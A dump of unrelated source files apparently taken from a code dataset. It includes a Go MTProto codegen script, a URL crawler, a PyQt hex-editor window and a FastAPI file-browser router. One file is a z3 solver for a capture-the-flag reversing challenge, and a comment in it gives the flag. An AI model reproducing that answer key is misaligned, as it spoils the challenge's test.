elif (paramType == 'repeated int32'):
classTypesTexts += ' x.VectorInt(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'repeated int64'):
classTypesTexts += ' x.VectorLong(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType == 'repeated string'):
classTypesTexts += ' x.VectorString(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType in TypesList):
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
else:
if (paramType == 'TQueryType'):
# classTypesTexts += ' bytes ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + ')\n';
elif (paramType.find('std::vector') >= 0):
eptype = txt_wrap_by('<', '*', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
classTypesTexts += ' }\n'
elif (paramType.find('TLObjectVector') >= 0):
eptype = txt_wrap_by('<', '>', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
classTypesTexts += ' // x%d := make([]byte, 8)\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d, uint32(TLConstructor_CRC32_vector))\n' % (ii)
classTypesTexts += ' // binary.LittleEndian.PutUint32(x%d[4:], uint32(len(m.%s)))\n' % (ii, to_proto_go_name(paramName))
classTypesTexts += ' x.Int(int32(TLConstructor_CRC32_vector))\n'
classTypesTexts += ' x.Int(int32(len(m.%s)))\n' % (to_proto_go_name(paramName))
classTypesTexts += ' for _, v := range m.' + to_proto_go_name(paramName) + ' {\n'
classTypesTexts += ' x.buf = append(x.buf, (*v).Encode()...)\n'
classTypesTexts += ' }\n'
else:
# classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
if (paramName in conditionsList):
classTypesTexts += ' }\n';
ii += 1;
classTypesTexts += ' return x.buf\n'
classTypesTexts += '}\n\n';
classTypesTexts += 'func (m* TL' + to_proto_go_name(name) + ') Decode(dbuf *DecodeBuf) error {\n'; # type class declaration
if (hasFlags):
classTypesTexts += ' flags := dbuf.UInt()\n'
if (name=='messages_channelMessages'):
classTypesTexts += ' if flags != 0 {}\n'
ii = 1;
for paramName in prmsList:
paramType = prms[paramName];
if (paramName == 'flags'):
continue;
if (paramName in conditionsList):
classTypesTexts += ' if (flags & (1 << ' + conditions[paramName] + ')) != 0 {\n';
if (paramType == 'bool'):
if (paramName in conditionsList):
# classTypesTexts += '';
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = true\n';
elif (paramType =='int32'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Int()\n';
elif (paramType == 'int64'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Long() \n';
elif (paramType == 'double'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Double()\n';
elif (paramType == 'int128'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(16)\n';
elif (paramType == 'int256'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.Bytes(32)\n';
elif (paramType == 'string'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.String()\n';
elif (paramType == 'bytes'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.StringBytes()\n';
elif (paramType == 'repeated int32'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorInt()\n';
elif (paramType == 'repeated int64'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorLong()\n';
elif (paramType == 'repeated string'):
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = dbuf.VectorString()\n';
elif (paramType in TypesList):
# classTypesTexts += ' // x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = &' + to_proto_go_name(paramType) + '{}\n';
classTypesTexts += ' (*m.' + to_proto_go_name(paramName) + ').Decode(dbuf)\n';
else:
if (paramType == 'TQueryType'):
# classTypesTexts += ' bytes ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' // TODO(@benqi): 暂时这么做,估计还是使用Any类型比较好\n'
classTypesTexts += ' o%d := dbuf.Object()\n' % (ii)
classTypesTexts += ' m.' + to_proto_go_name(paramName) + ' = o%d.Encode()\n' % (ii)
elif (paramType.find('std::vector') >= 0):
eptype = txt_wrap_by('<', '*', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' // if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
classTypesTexts += ' // return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
classTypesTexts += ' // }\n'
classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
if (eptype in TypesList):
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
else:
classTypesTexts += ' dbuf.Int()\n'
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' }\n'
elif (paramType.find('TLObjectVector') >= 0):
eptype = txt_wrap_by('<', '>', paramType);
classTypesTexts += ' // x.VectorMessage(m.' + to_proto_go_name(paramName) + ')\n';
classTypesTexts += ' c%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' if c%d != int32(TLConstructor_CRC32_vector) {\n' % (ii)
classTypesTexts += ' return fmt.Errorf("Not vector, classID: ", c%d)\n' % (ii)
classTypesTexts += ' }\n'
classTypesTexts += ' l%d := dbuf.Int()\n' % (ii)
classTypesTexts += ' m.%s = make([]*%s, l%d)\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype), ii)
classTypesTexts += ' for i := 0; i < int(l%d); i++ {\n' % (ii)
classTypesTexts += ' m.%s[i] = &%s{}\n' % (to_proto_go_name(paramName), to_proto_go_name(eptype))
if (eptype in TypesList):
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
else:
classTypesTexts += ' dbuf.Int()\n'
classTypesTexts += ' (*m.%s[i]).Decode(dbuf)\n' % (to_proto_go_name(paramName))
classTypesTexts += ' // TODO(@benqi): Check classID valid!!!\n'
classTypesTexts += ' // dbuf.Int()\n'
classTypesTexts += ' }\n'
else:
# classTypesTexts += ' // 2. ' + paramType + ' ' + paramName + ' = ' + str(ii) + ';\n';
classTypesTexts += ' // other!!!! x.Bytes(m.' + to_proto_go_name(paramName) + '.Encode())\n';
if (paramName in conditionsList):
classTypesTexts += ' }\n';
ii += 1;
classTypesTexts += ' return dbuf.err\n'
classTypesTexts += '}\n\n';
proto_file = '\
/*\n\
* WARNING! All changes made in this file will be lost!\n\
* Created from \'scheme.tl\' by \'codegen_encode_decode.py\'\n\
*\n\
* Copyright (c) 2017, https://github.com/nebulaim\n\
* All rights reserved.\n\
*\n\
* Licensed under the Apache License, Version 2.0 (the "License");\n\
* you may not use this file except in compliance with the License.\n\
* You may obtain a copy of the License at\n\
*\n\
* http://www.apache.org/licenses/LICENSE-2.0\n\
*\n\
* Unless required by applicable law or agreed to in writing, software\n\
* distributed under the License is distributed on an "AS IS" BASIS,\n\
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\
* See the License for the specific language governing permissions and\n\
* limitations under the License.\n\
*/\n\n\
package mtproto\n\n\
import ( \n\
// "encoding/binary" \n\
"fmt" \n\
"github.com/golang/protobuf/proto"\n\
)\n\n\
type newTLObjectFunc func() TLObject\n\n\
var registers2 = map[int32]newTLObjectFunc {\n\
' + ''.join(registers) + '}\n\n\
func NewTLObjectByClassID(classId int32) TLObject { \n\
m, ok := registers2[classId]\n\
if !ok {\n\
return nil\n\
}\n\
return m()\n\
}\n\n\
//////////////////////////////////////////////////////////////////////////////////////////\n\
' + resClassTypesTexts + '\n\n\
' + classTypesTexts + '\n'
already_header = ''
if os.path.isfile(proto_file):
with open(output_proto, 'r') as already:
already_header = already.read()
if already_header != proto_file:
with open(output_proto, 'w') as out:
out.write(proto_file)
|
19,296 | e56074ff66854ef6a2fc691e686a2f2de09a0d5c | '''
Created on 20/11/2015
@author: Joao Pimentel
'''
import requests
from ..utils import progress
from ..database.connection import connect
from ..database.queries import first
from ..database.queries import q_select_void, q_update_void
from ..database.queries import fq_select_resource_cache
from ..database.queries import fq_insert_resource_cache, fq_update_online_void
def void_resources():
with connect as conn:
return list(conn.execute(q_select_void))
def update_description():
with connect as conn:
print(len(list(conn.execute(q_update_void))), 'alterados')
def crawler(resources):
for resource in progress(resources):
try:
resp = requests.get(resource.url)
except:
pass
else:
with connect as conn:
rupdate = fq_update_online_void(resource.resource_id,
resp.status_code == 200)
if (resp.status_code == 200):
content = resp.content
content_type = resp.headers.get('content-type')
encoding = resp.encoding
rid = resource.resource_id
rcselect = fq_select_resource_cache(rid)
rcinsert = fq_insert_resource_cache(
rid, content, content_type, encoding)
if not first(conn.execute(rcselect)):
conn.execute(rcinsert)
conn.execute(rupdate)
resp.close()
|
19,297 | 3edbdce3f4c7475f55dac39fe37c905baab1ee56 | from z3 import *
s = Solver()
v6 = Int('v6')
v7 = Int('v7')
v8 = Int('v8')
v9 = Int('v9')
v10 = Int('v10')
v11 = Int('v11')
v12 = Int('v12')
v13 = Int('v13')
v14 = Int('v14')
v15 = Int('v15')
v16 = Int('v16')
v17 = Int('v17')
v18 = Int('v18')
v19 = Int('v19')
v20 = Int('v20')
v21 = Int('v21')
v22 = Int('v22')
v23 = Int('v23')
v24 = Int('v24')
v25 = Int('v25')
v26 = Int('v26')
v27 = Int('v27')
v28 = Int('v28')
v29 = Int('v29')
v30 = Int('v30')
v31 = Int('v31')
v32 = Int('v32')
v33 = Int('v33')
v34 = Int('v34')
v35 = Int('v35')
s.add(v6 >= 32,v6 <=126)
s.add(v7 >= 32,v7 <=126)
s.add(v8 >= 32,v8 <=126)
s.add(v9 >= 32,v9 <=126)
s.add(v10 >= 32,v10 <=126)
s.add(v11 >= 32,v11 <=126)
s.add(v12 >= 32,v12 <=126)
s.add(v13 >= 32,v13 <=126)
s.add(v14 >= 32,v14 <=126)
s.add(v15 >= 32,v15 <=126)
s.add(v16 >= 32,v16 <=126)
s.add(v17 >= 32,v17 <=126)
s.add(v18 >= 32,v18 <=126)
s.add(v19 >= 32,v19 <=126)
s.add(v20 >= 32,v20 <=126)
s.add(v21 >= 32,v21 <=126)
s.add(v22 >= 32,v22 <=126)
s.add(v23 >= 32,v23 <=126)
s.add(v24 >= 32,v24 <=126)
s.add(v25 >= 32,v25 <=126)
s.add(v26 >= 32,v26 <=126)
s.add(v27 >= 32,v27 <=126)
s.add(v28 >= 32,v28 <=126)
s.add(v29 >= 32,v29 <=126)
s.add(v30 >= 32,v30 <=126)
s.add(v31 >= 32,v31 <=126)
s.add(v32 >= 32,v32 <=126)
s.add(v33 >= 32,v33 <=126)
s.add(v34 >= 32,v34 <=126)
s.add(v35>=32, v35<=126)
s.add(v7 + v6 - v8 == 81)
s.add( v6 - v7 + v8 == 53)
s.add(v7 - v6 + v8 == 87)
s.add(v10 + v9 - v11 == 90)
s.add(v9 - v10 + v11 == 156)
s.add( v10 - v9 + v11 == 66)
s.add(v13 + v12 - v14 == 98 )
s.add(v12 - v13 + v14 == 140 )
s.add(v13 - v12 + v14 == 92)
s.add(v16 + v15 - v17 == 38 )
s.add(v15 - v16 + v17 == 170)
s.add(v16 - v15 + v17 == 60)
s.add(v19 + v18 - v20 == 29)
s.add(v18 - v19 + v20 == 161)
s.add(v19 - v18 + v20 == 69)
s.add(v22 + v21 - v23 == 163)
s.add(v21 - v22 + v23 == 27 )
s.add(v22 - v21 + v23 == 69)
s.add(v25 + v24 - v26 == 147)
s.add(v24 - v25 + v26 == 43)
s.add(v25 - v24 + v26 == 59)
s.add(v28 + v27 - v29 == 146)
s.add(v27 - v28 + v29 == 86 )
s.add(v28 - v27 + v29 == 44 )
s.add(v31 + v30 - v32 == 67)
s.add(v30 - v31 + v32 == 89)
s.add(v31 - v30 + v32 == 75)
s.add(v34 + v33 - v35 == 117)
s.add(v33 - v34 + v35 == 125)
s.add(v34 - v33 + v35 == 125)
if (s.check() == sat):
print s.model() #reorder it then decimal->hex->string
#Ordered = [67,84,70,123,78,111,119,95,116,104,49,115,95,49,115,95,116,48,95,103,51,116,95,65,78,71,82,121,121,125]
#CTF{Now_th1s_1s_t0_g3t_ANGRyy}
|
19,298 | 61e1dae5beac080dbb188db0d36add55da869b82 |
from PyQt5.QtWidgets import QMdiArea,QMdiSubWindow
from PyQt5.QtCore import Qt
from hexEdit import HexEdit
class MdiArea(QMdiArea):
def __init__(self):
QMdiArea.__init__(self)
def createNewSubHex(self,path=None):
newHex = QMdiSubWindow();
newHex.setWidget(HexEdit(path));
newHex.setAttribute(Qt.WA_DeleteOnClose);
self.addSubWindow(newHex);
newHex.show() |
19,299 | 5e4e32e893fd65bf28b991a9332a91b766434236 | # -*- coding:utf-8 -*-
from fastapi import APIRouter
from braggy.backend.app import App
from braggy.backend.models import DirList, FilePath
class FileBrowser():
def __init__(self):
self.router = APIRouter()
self.router.add_api_route(
"/init",
self._get_list_dir,
name="list_dir",
response_model=DirList,
methods=["GET"]
)
self.router.add_api_route(
"/list-dir",
self._post_list_dir,
name="list_dir",
response_model=DirList,
methods=["POST"]
)
async def _post_list_dir(self, path: FilePath):
content = {"items": App().file_browser.list_dir(path.path)}
return content
async def _get_list_dir(self):
content = {"items": App().file_browser.list_dir("")}
return content
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.